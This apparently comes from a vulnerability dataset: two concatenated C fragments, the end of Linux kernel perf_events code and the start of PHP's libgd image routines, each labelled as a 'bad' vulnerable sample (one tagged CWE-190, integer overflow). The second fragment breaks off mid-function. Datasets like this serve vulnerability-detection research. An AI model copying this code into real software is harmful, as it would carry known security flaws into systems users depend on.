perf_event_task(child, NULL, 0);
}
static void perf_free_event(struct perf_event *event,
struct perf_event_context *ctx)
{
struct perf_event *parent = event->parent;
if (WARN_ON_ONCE(!parent))
return;
mutex_lock(&parent->child_mutex);
list_del_init(&event->child_list);
mutex_unlock(&parent->child_mutex);
put_event(parent);
raw_spin_lock_irq(&ctx->lock);
perf_group_detach(event);
list_del_event(event, ctx);
raw_spin_unlock_irq(&ctx->lock);
free_event(event);
}
/*
* Free an unexposed, unused context as created by inheritance by
* perf_event_init_task below, used by fork() in case of fail.
*
* Not all locks are strictly required, but take them anyway to be nice and
* help out with the lockdep assertions.
*/
void perf_event_free_task(struct task_struct *task)
{
struct perf_event_context *ctx;
struct perf_event *event, *tmp;
int ctxn;
for_each_task_context_nr(ctxn) {
ctx = task->perf_event_ctxp[ctxn];
if (!ctx)
continue;
mutex_lock(&ctx->mutex);
again:
list_for_each_entry_safe(event, tmp, &ctx->pinned_groups,
group_entry)
perf_free_event(event, ctx);
list_for_each_entry_safe(event, tmp, &ctx->flexible_groups,
group_entry)
perf_free_event(event, ctx);
if (!list_empty(&ctx->pinned_groups) ||
!list_empty(&ctx->flexible_groups))
goto again;
mutex_unlock(&ctx->mutex);
put_ctx(ctx);
}
}
void perf_event_delayed_put(struct task_struct *task)
{
int ctxn;
for_each_task_context_nr(ctxn)
WARN_ON_ONCE(task->perf_event_ctxp[ctxn]);
}
struct file *perf_event_get(unsigned int fd)
{
struct file *file;
file = fget_raw(fd);
if (!file)
return ERR_PTR(-EBADF);
if (file->f_op != &perf_fops) {
fput(file);
return ERR_PTR(-EBADF);
}
return file;
}
const struct perf_event_attr *perf_event_attrs(struct perf_event *event)
{
if (!event)
return ERR_PTR(-EINVAL);
return &event->attr;
}
/*
* inherit a event from parent task to child task:
*/
static struct perf_event *
inherit_event(struct perf_event *parent_event,
struct task_struct *parent,
struct perf_event_context *parent_ctx,
struct task_struct *child,
struct perf_event *group_leader,
struct perf_event_context *child_ctx)
{
enum perf_event_active_state parent_state = parent_event->state;
struct perf_event *child_event;
unsigned long flags;
/*
* Instead of creating recursive hierarchies of events,
* we link inherited events back to the original parent,
* which has a filp for sure, which we use as the reference
* count:
*/
if (parent_event->parent)
parent_event = parent_event->parent;
child_event = perf_event_alloc(&parent_event->attr,
parent_event->cpu,
child,
group_leader, parent_event,
NULL, NULL, -1);
if (IS_ERR(child_event))
return child_event;
/*
* is_orphaned_event() and list_add_tail(&parent_event->child_list)
* must be under the same lock in order to serialize against
* perf_event_release_kernel(), such that either we must observe
* is_orphaned_event() or they will observe us on the child_list.
*/
mutex_lock(&parent_event->child_mutex);
if (is_orphaned_event(parent_event) ||
!atomic_long_inc_not_zero(&parent_event->refcount)) {
mutex_unlock(&parent_event->child_mutex);
free_event(child_event);
return NULL;
}
get_ctx(child_ctx);
/*
* Make the child state follow the state of the parent event,
* not its attr.disabled bit. We hold the parent's mutex,
* so we won't race with perf_event_{en, dis}able_family.
*/
if (parent_state >= PERF_EVENT_STATE_INACTIVE)
child_event->state = PERF_EVENT_STATE_INACTIVE;
else
child_event->state = PERF_EVENT_STATE_OFF;
if (parent_event->attr.freq) {
u64 sample_period = parent_event->hw.sample_period;
struct hw_perf_event *hwc = &child_event->hw;
hwc->sample_period = sample_period;
hwc->last_period = sample_period;
local64_set(&hwc->period_left, sample_period);
}
child_event->ctx = child_ctx;
child_event->overflow_handler = parent_event->overflow_handler;
child_event->overflow_handler_context
= parent_event->overflow_handler_context;
/*
* Precalculate sample_data sizes
*/
perf_event__header_size(child_event);
perf_event__id_header_size(child_event);
/*
* Link it up in the child's context:
*/
raw_spin_lock_irqsave(&child_ctx->lock, flags);
add_event_to_ctx(child_event, child_ctx);
raw_spin_unlock_irqrestore(&child_ctx->lock, flags);
/*
* Link this into the parent event's child list
*/
list_add_tail(&child_event->child_list, &parent_event->child_list);
mutex_unlock(&parent_event->child_mutex);
return child_event;
}
static int inherit_group(struct perf_event *parent_event,
struct task_struct *parent,
struct perf_event_context *parent_ctx,
struct task_struct *child,
struct perf_event_context *child_ctx)
{
struct perf_event *leader;
struct perf_event *sub;
struct perf_event *child_ctr;
leader = inherit_event(parent_event, parent, parent_ctx,
child, NULL, child_ctx);
if (IS_ERR(leader))
return PTR_ERR(leader);
list_for_each_entry(sub, &parent_event->sibling_list, group_entry) {
child_ctr = inherit_event(sub, parent, parent_ctx,
child, leader, child_ctx);
if (IS_ERR(child_ctr))
return PTR_ERR(child_ctr);
}
return 0;
}
static int
inherit_task_group(struct perf_event *event, struct task_struct *parent,
struct perf_event_context *parent_ctx,
struct task_struct *child, int ctxn,
int *inherited_all)
{
int ret;
struct perf_event_context *child_ctx;
if (!event->attr.inherit) {
*inherited_all = 0;
return 0;
}
child_ctx = child->perf_event_ctxp[ctxn];
if (!child_ctx) {
/*
* This is executed from the parent task context, so
* inherit events that have been marked for cloning.
* First allocate and initialize a context for the
* child.
*/
child_ctx = alloc_perf_context(parent_ctx->pmu, child);
if (!child_ctx)
return -ENOMEM;
child->perf_event_ctxp[ctxn] = child_ctx;
}
ret = inherit_group(event, parent, parent_ctx,
child, child_ctx);
if (ret)
*inherited_all = 0;
return ret;
}
/*
* Initialize the perf_event context in task_struct
*/
static int perf_event_init_context(struct task_struct *child, int ctxn)
{
struct perf_event_context *child_ctx, *parent_ctx;
struct perf_event_context *cloned_ctx;
struct perf_event *event;
struct task_struct *parent = current;
int inherited_all = 1;
unsigned long flags;
int ret = 0;
if (likely(!parent->perf_event_ctxp[ctxn]))
return 0;
/*
* If the parent's context is a clone, pin it so it won't get
* swapped under us.
*/
parent_ctx = perf_pin_task_context(parent, ctxn);
if (!parent_ctx)
return 0;
/*
* No need to check if parent_ctx != NULL here; since we saw
* it non-NULL earlier, the only reason for it to become NULL
* is if we exit, and since we're currently in the middle of
* a fork we can't be exiting at the same time.
*/
/*
* Lock the parent list. No need to lock the child - not PID
* hashed yet and not running, so nobody can access it.
*/
mutex_lock(&parent_ctx->mutex);
/*
* We dont have to disable NMIs - we are only looking at
* the list, not manipulating it:
*/
list_for_each_entry(event, &parent_ctx->pinned_groups, group_entry) {
ret = inherit_task_group(event, parent, parent_ctx,
child, ctxn, &inherited_all);
if (ret)
break;
}
/*
* We can't hold ctx->lock when iterating the ->flexible_group list due
* to allocations, but we need to prevent rotation because
* rotate_ctx() will change the list from interrupt context.
*/
raw_spin_lock_irqsave(&parent_ctx->lock, flags);
parent_ctx->rotate_disable = 1;
raw_spin_unlock_irqrestore(&parent_ctx->lock, flags);
list_for_each_entry(event, &parent_ctx->flexible_groups, group_entry) {
ret = inherit_task_group(event, parent, parent_ctx,
child, ctxn, &inherited_all);
if (ret)
break;
}
raw_spin_lock_irqsave(&parent_ctx->lock, flags);
parent_ctx->rotate_disable = 0;
child_ctx = child->perf_event_ctxp[ctxn];
if (child_ctx && inherited_all) {
/*
* Mark the child context as a clone of the parent
* context, or of whatever the parent is a clone of.
*
* Note that if the parent is a clone, the holding of
* parent_ctx->lock avoids it from being uncloned.
*/
cloned_ctx = parent_ctx->parent_ctx;
if (cloned_ctx) {
child_ctx->parent_ctx = cloned_ctx;
child_ctx->parent_gen = parent_ctx->parent_gen;
} else {
child_ctx->parent_ctx = parent_ctx;
child_ctx->parent_gen = parent_ctx->generation;
}
get_ctx(child_ctx->parent_ctx);
}
raw_spin_unlock_irqrestore(&parent_ctx->lock, flags);
mutex_unlock(&parent_ctx->mutex);
perf_unpin_context(parent_ctx);
put_ctx(parent_ctx);
return ret;
}
/*
* Initialize the perf_event context in task_struct
*/
int perf_event_init_task(struct task_struct *child)
{
int ctxn, ret;
memset(child->perf_event_ctxp, 0, sizeof(child->perf_event_ctxp));
mutex_init(&child->perf_event_mutex);
INIT_LIST_HEAD(&child->perf_event_list);
for_each_task_context_nr(ctxn) {
ret = perf_event_init_context(child, ctxn);
if (ret) {
perf_event_free_task(child);
return ret;
}
}
return 0;
}
static void __init perf_event_init_all_cpus(void)
{
struct swevent_htable *swhash;
int cpu;
for_each_possible_cpu(cpu) {
swhash = &per_cpu(swevent_htable, cpu);
mutex_init(&swhash->hlist_mutex);
INIT_LIST_HEAD(&per_cpu(active_ctx_list, cpu));
INIT_LIST_HEAD(&per_cpu(pmu_sb_events.list, cpu));
raw_spin_lock_init(&per_cpu(pmu_sb_events.lock, cpu));
#ifdef CONFIG_CGROUP_PERF
INIT_LIST_HEAD(&per_cpu(cgrp_cpuctx_list, cpu));
#endif
INIT_LIST_HEAD(&per_cpu(sched_cb_list, cpu));
}
}
int perf_event_init_cpu(unsigned int cpu)
{
struct swevent_htable *swhash = &per_cpu(swevent_htable, cpu);
mutex_lock(&swhash->hlist_mutex);
if (swhash->hlist_refcount > 0 && !swevent_hlist_deref(swhash)) {
struct swevent_hlist *hlist;
hlist = kzalloc_node(sizeof(*hlist), GFP_KERNEL, cpu_to_node(cpu));
WARN_ON(!hlist);
rcu_assign_pointer(swhash->swevent_hlist, hlist);
}
mutex_unlock(&swhash->hlist_mutex);
return 0;
}
#if defined CONFIG_HOTPLUG_CPU || defined CONFIG_KEXEC_CORE
static void __perf_event_exit_context(void *__info)
{
struct perf_event_context *ctx = __info;
struct perf_cpu_context *cpuctx = __get_cpu_context(ctx);
struct perf_event *event;
raw_spin_lock(&ctx->lock);
list_for_each_entry(event, &ctx->event_list, event_entry)
__perf_remove_from_context(event, cpuctx, ctx, (void *)DETACH_GROUP);
raw_spin_unlock(&ctx->lock);
}
static void perf_event_exit_cpu_context(int cpu)
{
struct perf_event_context *ctx;
struct pmu *pmu;
int idx;
idx = srcu_read_lock(&pmus_srcu);
list_for_each_entry_rcu(pmu, &pmus, entry) {
ctx = &per_cpu_ptr(pmu->pmu_cpu_context, cpu)->ctx;
mutex_lock(&ctx->mutex);
smp_call_function_single(cpu, __perf_event_exit_context, ctx, 1);
mutex_unlock(&ctx->mutex);
}
srcu_read_unlock(&pmus_srcu, idx);
}
#else
static void perf_event_exit_cpu_context(int cpu) { }
#endif
int perf_event_exit_cpu(unsigned int cpu)
{
perf_event_exit_cpu_context(cpu);
return 0;
}
static int
perf_reboot(struct notifier_block *notifier, unsigned long val, void *v)
{
int cpu;
for_each_online_cpu(cpu)
perf_event_exit_cpu(cpu);
return NOTIFY_OK;
}
/*
* Run the perf reboot notifier at the very last possible moment so that
* the generic watchdog code runs as long as possible.
*/
static struct notifier_block perf_reboot_notifier = {
.notifier_call = perf_reboot,
.priority = INT_MIN,
};
void __init perf_event_init(void)
{
int ret;
idr_init(&pmu_idr);
perf_event_init_all_cpus();
init_srcu_struct(&pmus_srcu);
perf_pmu_register(&perf_swevent, "software", PERF_TYPE_SOFTWARE);
perf_pmu_register(&perf_cpu_clock, NULL, -1);
perf_pmu_register(&perf_task_clock, NULL, -1);
perf_tp_register();
perf_event_init_cpu(smp_processor_id());
register_reboot_notifier(&perf_reboot_notifier);
ret = init_hw_breakpoint();
WARN(ret, "hw_breakpoint initialization failed with: %d", ret);
/*
* Build time assertion that we keep the data_head at the intended
* location. IOW, validation we got the __reserved[] size right.
*/
BUILD_BUG_ON((offsetof(struct perf_event_mmap_page, data_head))
!= 1024);
}
ssize_t perf_event_sysfs_show(struct device *dev, struct device_attribute *attr,
char *page)
{
struct perf_pmu_events_attr *pmu_attr =
container_of(attr, struct perf_pmu_events_attr, attr);
if (pmu_attr->event_str)
return sprintf(page, "%s\n", pmu_attr->event_str);
return 0;
}
EXPORT_SYMBOL_GPL(perf_event_sysfs_show);
static int __init perf_event_sysfs_init(void)
{
struct pmu *pmu;
int ret;
mutex_lock(&pmus_lock);
ret = bus_register(&pmu_bus);
if (ret)
goto unlock;
list_for_each_entry(pmu, &pmus, entry) {
if (!pmu->name || pmu->type < 0)
continue;
ret = pmu_dev_alloc(pmu);
WARN(ret, "Failed to register pmu: %s, reason %d\n", pmu->name, ret);
}
pmu_bus_running = 1;
ret = 0;
unlock:
mutex_unlock(&pmus_lock);
return ret;
}
device_initcall(perf_event_sysfs_init);
#ifdef CONFIG_CGROUP_PERF
static struct cgroup_subsys_state *
perf_cgroup_css_alloc(struct cgroup_subsys_state *parent_css)
{
struct perf_cgroup *jc;
jc = kzalloc(sizeof(*jc), GFP_KERNEL);
if (!jc)
return ERR_PTR(-ENOMEM);
jc->info = alloc_percpu(struct perf_cgroup_info);
if (!jc->info) {
kfree(jc);
return ERR_PTR(-ENOMEM);
}
return &jc->css;
}
static void perf_cgroup_css_free(struct cgroup_subsys_state *css)
{
struct perf_cgroup *jc = container_of(css, struct perf_cgroup, css);
free_percpu(jc->info);
kfree(jc);
}
static int __perf_cgroup_move(void *info)
{
struct task_struct *task = info;
rcu_read_lock();
perf_cgroup_switch(task, PERF_CGROUP_SWOUT | PERF_CGROUP_SWIN);
rcu_read_unlock();
return 0;
}
static void perf_cgroup_attach(struct cgroup_taskset *tset)
{
struct task_struct *task;
struct cgroup_subsys_state *css;
cgroup_taskset_for_each(task, css, tset)
task_function_call(task, __perf_cgroup_move, task);
}
struct cgroup_subsys perf_event_cgrp_subsys = {
.css_alloc = perf_cgroup_css_alloc,
.css_free = perf_cgroup_css_free,
.attach = perf_cgroup_attach,
};
#endif /* CONFIG_CGROUP_PERF */
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_3027_0 |
crossvul-cpp_data_bad_5167_1 |
#include <math.h>
#include <string.h>
#include <stdlib.h>
#include "gd.h"
#include "gdhelpers.h"
#include "php.h"
#ifdef _MSC_VER
# if _MSC_VER >= 1300
/* in MSVC.NET these are available but only for __cplusplus and not _MSC_EXTENSIONS */
# if !defined(_MSC_EXTENSIONS) && defined(__cplusplus)
# define HAVE_FABSF 1
extern float fabsf(float x);
# define HAVE_FLOORF 1
extern float floorf(float x);
# endif /*MSVC.NET */
# endif /* MSC */
#endif
#ifndef HAVE_FABSF
# define HAVE_FABSF 0
#endif
#ifndef HAVE_FLOORF
# define HAVE_FLOORF 0
#endif
#if HAVE_FABSF == 0
/* float fabsf(float x); */
# ifndef fabsf
# define fabsf(x) ((float)(fabs(x)))
# endif
#endif
#if HAVE_FLOORF == 0
# ifndef floorf
/* float floorf(float x);*/
# define floorf(x) ((float)(floor(x)))
# endif
#endif
#ifdef _OSD_POSIX /* BS2000 uses the EBCDIC char set instead of ASCII */
#define CHARSET_EBCDIC
#define __attribute__(any) /*nothing */
#endif
/*_OSD_POSIX*/
#ifndef CHARSET_EBCDIC
#define ASC(ch) ch
#else /*CHARSET_EBCDIC */
#define ASC(ch) gd_toascii[(unsigned char)ch]
static const unsigned char gd_toascii[256] =
{
/*00 */ 0x00, 0x01, 0x02, 0x03, 0x85, 0x09, 0x86, 0x7f,
0x87, 0x8d, 0x8e, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, /*................ */
/*10 */ 0x10, 0x11, 0x12, 0x13, 0x8f, 0x0a, 0x08, 0x97,
0x18, 0x19, 0x9c, 0x9d, 0x1c, 0x1d, 0x1e, 0x1f, /*................ */
/*20 */ 0x80, 0x81, 0x82, 0x83, 0x84, 0x92, 0x17, 0x1b,
0x88, 0x89, 0x8a, 0x8b, 0x8c, 0x05, 0x06, 0x07, /*................ */
/*30 */ 0x90, 0x91, 0x16, 0x93, 0x94, 0x95, 0x96, 0x04,
0x98, 0x99, 0x9a, 0x9b, 0x14, 0x15, 0x9e, 0x1a, /*................ */
/*40 */ 0x20, 0xa0, 0xe2, 0xe4, 0xe0, 0xe1, 0xe3, 0xe5,
0xe7, 0xf1, 0x60, 0x2e, 0x3c, 0x28, 0x2b, 0x7c, /* .........`.<(+| */
/*50 */ 0x26, 0xe9, 0xea, 0xeb, 0xe8, 0xed, 0xee, 0xef,
0xec, 0xdf, 0x21, 0x24, 0x2a, 0x29, 0x3b, 0x9f, /*&.........!$*);. */
/*60 */ 0x2d, 0x2f, 0xc2, 0xc4, 0xc0, 0xc1, 0xc3, 0xc5,
0xc7, 0xd1, 0x5e, 0x2c, 0x25, 0x5f, 0x3e, 0x3f,
/*-/........^,%_>?*/
/*70 */ 0xf8, 0xc9, 0xca, 0xcb, 0xc8, 0xcd, 0xce, 0xcf,
0xcc, 0xa8, 0x3a, 0x23, 0x40, 0x27, 0x3d, 0x22, /*..........:#@'=" */
/*80 */ 0xd8, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67,
0x68, 0x69, 0xab, 0xbb, 0xf0, 0xfd, 0xfe, 0xb1, /*.abcdefghi...... */
/*90 */ 0xb0, 0x6a, 0x6b, 0x6c, 0x6d, 0x6e, 0x6f, 0x70,
0x71, 0x72, 0xaa, 0xba, 0xe6, 0xb8, 0xc6, 0xa4, /*.jklmnopqr...... */
/*a0 */ 0xb5, 0xaf, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78,
0x79, 0x7a, 0xa1, 0xbf, 0xd0, 0xdd, 0xde, 0xae, /*..stuvwxyz...... */
/*b0 */ 0xa2, 0xa3, 0xa5, 0xb7, 0xa9, 0xa7, 0xb6, 0xbc,
0xbd, 0xbe, 0xac, 0x5b, 0x5c, 0x5d, 0xb4, 0xd7, /*...........[\].. */
/*c0 */ 0xf9, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47,
0x48, 0x49, 0xad, 0xf4, 0xf6, 0xf2, 0xf3, 0xf5, /*.ABCDEFGHI...... */
/*d0 */ 0xa6, 0x4a, 0x4b, 0x4c, 0x4d, 0x4e, 0x4f, 0x50,
0x51, 0x52, 0xb9, 0xfb, 0xfc, 0xdb, 0xfa, 0xff, /*.JKLMNOPQR...... */
/*e0 */ 0xd9, 0xf7, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58,
0x59, 0x5a, 0xb2, 0xd4, 0xd6, 0xd2, 0xd3, 0xd5, /*..STUVWXYZ...... */
/*f0 */ 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37,
0x38, 0x39, 0xb3, 0x7b, 0xdc, 0x7d, 0xda, 0x7e /*0123456789.{.}.~ */
};
#endif /*CHARSET_EBCDIC */
/* 2.0.10: cast instead of floor() yields 35% performance improvement. Thanks to John Buckman. */
#define floor_cast(exp) ((long) exp)
extern int gdCosT[];
extern int gdSinT[];
static void gdImageBrushApply(gdImagePtr im, int x, int y);
static void gdImageTileApply(gdImagePtr im, int x, int y);
static void gdImageAntiAliasedApply(gdImagePtr im, int x, int y);
static int gdLayerOverlay(int dst, int src);
static int gdAlphaOverlayColor(int src, int dst, int max);
int gdImageGetTrueColorPixel(gdImagePtr im, int x, int y);
void php_gd_error_ex(int type, const char *format, ...)
{
va_list args;
TSRMLS_FETCH();
va_start(args, format);
php_verror(NULL, "", type, format, args TSRMLS_CC);
va_end(args);
}
void php_gd_error(const char *format, ...)
{
va_list args;
TSRMLS_FETCH();
va_start(args, format);
php_verror(NULL, "", E_WARNING, format, args TSRMLS_CC);
va_end(args);
}
gdImagePtr gdImageCreate (int sx, int sy)
{
int i;
gdImagePtr im;
if (overflow2(sx, sy)) {
return NULL;
}
if (overflow2(sizeof(unsigned char *), sy)) {
return NULL;
}
im = (gdImage *) gdCalloc(1, sizeof(gdImage));
/* Row-major ever since gd 1.3 */
im->pixels = (unsigned char **) gdMalloc(sizeof(unsigned char *) * sy);
im->AA_opacity = (unsigned char **) gdMalloc(sizeof(unsigned char *) * sy);
im->polyInts = 0;
im->polyAllocated = 0;
im->brush = 0;
im->tile = 0;
im->style = 0;
for (i = 0; i < sy; i++) {
/* Row-major ever since gd 1.3 */
im->pixels[i] = (unsigned char *) gdCalloc(sx, sizeof(unsigned char));
im->AA_opacity[i] = (unsigned char *) gdCalloc(sx, sizeof(unsigned char));
}
im->sx = sx;
im->sy = sy;
im->colorsTotal = 0;
im->transparent = (-1);
im->interlace = 0;
im->thick = 1;
im->AA = 0;
im->AA_polygon = 0;
for (i = 0; i < gdMaxColors; i++) {
im->open[i] = 1;
im->red[i] = 0;
im->green[i] = 0;
im->blue[i] = 0;
}
im->trueColor = 0;
im->tpixels = 0;
im->cx1 = 0;
im->cy1 = 0;
im->cx2 = im->sx - 1;
im->cy2 = im->sy - 1;
im->interpolation = NULL;
im->interpolation_id = GD_BILINEAR_FIXED;
return im;
}
gdImagePtr gdImageCreateTrueColor (int sx, int sy)
{
int i;
gdImagePtr im;
if (overflow2(sx, sy)) {
return NULL;
}
if (overflow2(sizeof(unsigned char *), sy)) {
return NULL;
}
if (overflow2(sizeof(int), sx)) {
return NULL;
}
im = (gdImage *) gdMalloc(sizeof(gdImage));
memset(im, 0, sizeof(gdImage));
im->tpixels = (int **) gdMalloc(sizeof(int *) * sy);
im->AA_opacity = (unsigned char **) gdMalloc(sizeof(unsigned char *) * sy);
im->polyInts = 0;
im->polyAllocated = 0;
im->brush = 0;
im->tile = 0;
im->style = 0;
for (i = 0; i < sy; i++) {
im->tpixels[i] = (int *) gdCalloc(sx, sizeof(int));
im->AA_opacity[i] = (unsigned char *) gdCalloc(sx, sizeof(unsigned char));
}
im->sx = sx;
im->sy = sy;
im->transparent = (-1);
im->interlace = 0;
im->trueColor = 1;
/* 2.0.2: alpha blending is now on by default, and saving of alpha is
* off by default. This allows font antialiasing to work as expected
* on the first try in JPEGs -- quite important -- and also allows
* for smaller PNGs when saving of alpha channel is not really
* desired, which it usually isn't!
*/
im->saveAlphaFlag = 0;
im->alphaBlendingFlag = 1;
im->thick = 1;
im->AA = 0;
im->AA_polygon = 0;
im->cx1 = 0;
im->cy1 = 0;
im->cx2 = im->sx - 1;
im->cy2 = im->sy - 1;
im->interpolation = NULL;
im->interpolation_id = GD_BILINEAR_FIXED;
return im;
}
void gdImageDestroy (gdImagePtr im)
{
int i;
if (im->pixels) {
for (i = 0; i < im->sy; i++) {
gdFree(im->pixels[i]);
}
gdFree(im->pixels);
}
if (im->tpixels) {
for (i = 0; i < im->sy; i++) {
gdFree(im->tpixels[i]);
}
gdFree(im->tpixels);
}
if (im->AA_opacity) {
for (i = 0; i < im->sy; i++) {
gdFree(im->AA_opacity[i]);
}
gdFree(im->AA_opacity);
}
if (im->polyInts) {
gdFree(im->polyInts);
}
if (im->style) {
gdFree(im->style);
}
gdFree(im);
}
int gdImageColorClosest (gdImagePtr im, int r, int g, int b)
{
return gdImageColorClosestAlpha (im, r, g, b, gdAlphaOpaque);
}
int gdImageColorClosestAlpha (gdImagePtr im, int r, int g, int b, int a)
{
int i;
long rd, gd, bd, ad;
int ct = (-1);
int first = 1;
long mindist = 0;
if (im->trueColor) {
return gdTrueColorAlpha(r, g, b, a);
}
for (i = 0; i < im->colorsTotal; i++) {
long dist;
if (im->open[i]) {
continue;
}
rd = im->red[i] - r;
gd = im->green[i] - g;
bd = im->blue[i] - b;
/* gd 2.02: whoops, was - b (thanks to David Marwood) */
ad = im->alpha[i] - a;
dist = rd * rd + gd * gd + bd * bd + ad * ad;
if (first || (dist < mindist)) {
mindist = dist;
ct = i;
first = 0;
}
}
return ct;
}
/* This code is taken from http://www.acm.org/jgt/papers/SmithLyons96/hwb_rgb.html, an article
* on colour conversion to/from RBG and HWB colour systems.
* It has been modified to return the converted value as a * parameter.
*/
#define RETURN_HWB(h, w, b) {HWB->H = h; HWB->W = w; HWB->B = b; return HWB;}
#define RETURN_RGB(r, g, b) {RGB->R = r; RGB->G = g; RGB->B = b; return RGB;}
#define HWB_UNDEFINED -1
#define SETUP_RGB(s, r, g, b) {s.R = r/255.0f; s.G = g/255.0f; s.B = b/255.0f;}
#ifndef MIN
#define MIN(a,b) ((a)<(b)?(a):(b))
#endif
#define MIN3(a,b,c) ((a)<(b)?(MIN(a,c)):(MIN(b,c)))
#ifndef MAX
#define MAX(a,b) ((a)<(b)?(b):(a))
#endif
#define MAX3(a,b,c) ((a)<(b)?(MAX(b,c)):(MAX(a,c)))
/*
* Theoretically, hue 0 (pure red) is identical to hue 6 in these transforms. Pure
* red always maps to 6 in this implementation. Therefore UNDEFINED can be
* defined as 0 in situations where only unsigned numbers are desired.
*/
typedef struct
{
float R, G, B;
}
RGBType;
typedef struct
{
float H, W, B;
}
HWBType;
static HWBType * RGB_to_HWB (RGBType RGB, HWBType * HWB)
{
/*
* RGB are each on [0, 1]. W and B are returned on [0, 1] and H is
* returned on [0, 6]. Exception: H is returned UNDEFINED if W == 1 - B.
*/
float R = RGB.R, G = RGB.G, B = RGB.B, w, v, b, f;
int i;
w = MIN3 (R, G, B);
v = MAX3 (R, G, B);
b = 1 - v;
if (v == w) {
RETURN_HWB(HWB_UNDEFINED, w, b);
}
f = (R == w) ? G - B : ((G == w) ? B - R : R - G);
i = (R == w) ? 3 : ((G == w) ? 5 : 1);
RETURN_HWB(i - f / (v - w), w, b);
}
static float HWB_Diff (int r1, int g1, int b1, int r2, int g2, int b2)
{
RGBType RGB1, RGB2;
HWBType HWB1, HWB2;
float diff;
SETUP_RGB(RGB1, r1, g1, b1);
SETUP_RGB(RGB2, r2, g2, b2);
RGB_to_HWB(RGB1, &HWB1);
RGB_to_HWB(RGB2, &HWB2);
/*
* I made this bit up; it seems to produce OK results, and it is certainly
* more visually correct than the current RGB metric. (PJW)
*/
if ((HWB1.H == HWB_UNDEFINED) || (HWB2.H == HWB_UNDEFINED)) {
diff = 0.0f; /* Undefined hues always match... */
} else {
diff = fabsf(HWB1.H - HWB2.H);
if (diff > 3.0f) {
diff = 6.0f - diff; /* Remember, it's a colour circle */
}
}
diff = diff * diff + (HWB1.W - HWB2.W) * (HWB1.W - HWB2.W) + (HWB1.B - HWB2.B) * (HWB1.B - HWB2.B);
return diff;
}
#if 0
/*
* This is not actually used, but is here for completeness, in case someone wants to
* use the HWB stuff for anything else...
*/
static RGBType * HWB_to_RGB (HWBType HWB, RGBType * RGB)
{
/*
* H is given on [0, 6] or UNDEFINED. W and B are given on [0, 1].
* RGB are each returned on [0, 1].
*/
float h = HWB.H, w = HWB.W, b = HWB.B, v, n, f;
int i;
v = 1 - b;
if (h == HWB_UNDEFINED) {
RETURN_RGB(v, v, v);
}
i = floor(h);
f = h - i;
if (i & 1) {
f = 1 - f; /* if i is odd */
}
n = w + f * (v - w); /* linear interpolation between w and v */
switch (i) {
case 6:
case 0:
RETURN_RGB(v, n, w);
case 1:
RETURN_RGB(n, v, w);
case 2:
RETURN_RGB(w, v, n);
case 3:
RETURN_RGB(w, n, v);
case 4:
RETURN_RGB(n, w, v);
case 5:
RETURN_RGB(v, w, n);
}
return RGB;
}
#endif
int gdImageColorClosestHWB (gdImagePtr im, int r, int g, int b)
{
int i;
/* long rd, gd, bd; */
int ct = (-1);
int first = 1;
float mindist = 0;
if (im->trueColor) {
return gdTrueColor(r, g, b);
}
for (i = 0; i < im->colorsTotal; i++) {
float dist;
if (im->open[i]) {
continue;
}
dist = HWB_Diff(im->red[i], im->green[i], im->blue[i], r, g, b);
if (first || (dist < mindist)) {
mindist = dist;
ct = i;
first = 0;
}
}
return ct;
}
int gdImageColorExact (gdImagePtr im, int r, int g, int b)
{
return gdImageColorExactAlpha (im, r, g, b, gdAlphaOpaque);
}
int gdImageColorExactAlpha (gdImagePtr im, int r, int g, int b, int a)
{
int i;
if (im->trueColor) {
return gdTrueColorAlpha(r, g, b, a);
}
for (i = 0; i < im->colorsTotal; i++) {
if (im->open[i]) {
continue;
}
if ((im->red[i] == r) && (im->green[i] == g) && (im->blue[i] == b) && (im->alpha[i] == a)) {
return i;
}
}
return -1;
}
int gdImageColorAllocate (gdImagePtr im, int r, int g, int b)
{
return gdImageColorAllocateAlpha (im, r, g, b, gdAlphaOpaque);
}
int gdImageColorAllocateAlpha (gdImagePtr im, int r, int g, int b, int a)
{
int i;
int ct = (-1);
if (im->trueColor) {
return gdTrueColorAlpha(r, g, b, a);
}
for (i = 0; i < im->colorsTotal; i++) {
if (im->open[i]) {
ct = i;
break;
}
}
if (ct == (-1)) {
ct = im->colorsTotal;
if (ct == gdMaxColors) {
return -1;
}
im->colorsTotal++;
}
im->red[ct] = r;
im->green[ct] = g;
im->blue[ct] = b;
im->alpha[ct] = a;
im->open[ct] = 0;
return ct;
}
/*
* gdImageColorResolve is an alternative for the code fragment:
*
* if ((color=gdImageColorExact(im,R,G,B)) < 0)
* if ((color=gdImageColorAllocate(im,R,G,B)) < 0)
* color=gdImageColorClosest(im,R,G,B);
*
* in a single function. Its advantage is that it is guaranteed to
* return a color index in one search over the color table.
*/
int gdImageColorResolve (gdImagePtr im, int r, int g, int b)
{
return gdImageColorResolveAlpha(im, r, g, b, gdAlphaOpaque);
}
int gdImageColorResolveAlpha (gdImagePtr im, int r, int g, int b, int a)
{
int c;
int ct = -1;
int op = -1;
long rd, gd, bd, ad, dist;
long mindist = 4 * 255 * 255; /* init to max poss dist */
if (im->trueColor)
{
return gdTrueColorAlpha (r, g, b, a);
}
for (c = 0; c < im->colorsTotal; c++)
{
if (im->open[c])
{
op = c; /* Save open slot */
continue; /* Color not in use */
}
if (c == im->transparent)
{
/* don't ever resolve to the color that has
* been designated as the transparent color */
continue;
}
rd = (long) (im->red[c] - r);
gd = (long) (im->green[c] - g);
bd = (long) (im->blue[c] - b);
ad = (long) (im->alpha[c] - a);
dist = rd * rd + gd * gd + bd * bd + ad * ad;
if (dist < mindist)
{
if (dist == 0)
{
return c; /* Return exact match color */
}
mindist = dist;
ct = c;
}
}
/* no exact match. We now know closest, but first try to allocate exact */
if (op == -1)
{
op = im->colorsTotal;
if (op == gdMaxColors)
{ /* No room for more colors */
return ct; /* Return closest available color */
}
im->colorsTotal++;
}
im->red[op] = r;
im->green[op] = g;
im->blue[op] = b;
im->alpha[op] = a;
im->open[op] = 0;
return op; /* Return newly allocated color */
}
void gdImageColorDeallocate (gdImagePtr im, int color)
{
if (im->trueColor) {
return;
}
/* Mark it open. */
im->open[color] = 1;
}
void gdImageColorTransparent (gdImagePtr im, int color)
{
if (!im->trueColor) {
